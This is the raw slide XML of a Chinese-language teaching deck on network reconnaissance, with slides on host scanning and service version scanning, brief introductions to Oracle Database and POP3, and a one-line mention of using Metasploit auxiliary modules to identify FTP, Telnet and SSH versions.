                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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a:xfrm>
            <a:off x="5705255" y="1074420"/>
            <a:ext cx="6064250" cy="5004435"/>
            <a:chOff x="6387147" y="1859239"/>
            <a:chExt cx="6636879" cy="5004435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="6080910" cy="5004435"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Oracle 数据库简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Oracle Database，又名Oracle RDBMS，简称Oracle，是甲骨文公司的一款关系数据库管理系统，在数据库领域它一直处于领先地位，系统可移植性好、使用方便、功能强，适用于各类大、中、小、微机环境。它也是一款高效率的、可靠性高的、适应大吞吐量的数据库管理系统。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>POP3服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>POP3 (Post Office Protocol 3）即邮局协议版本3，主要用于支持使用客户端远程管理在服务器上的电子邮件。POP3允许用户从邮件服务器上把邮件存储到本地主机上，同时删除保存在邮件服务器上的邮件，而 POP3服务器则是遵循POP3协议的接收邮件服务器，用来接收电子邮件。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>08</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396181" y="4168099"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396181" y="4168099"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>09</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1552575"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1552575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="1337945"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>使用Metasploit 工具的辅助扫描模块对目标主机当前的FTP、Telnet、SSH等服务的版本号进行扫描，确定目标主机的服务版本信息。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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21" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
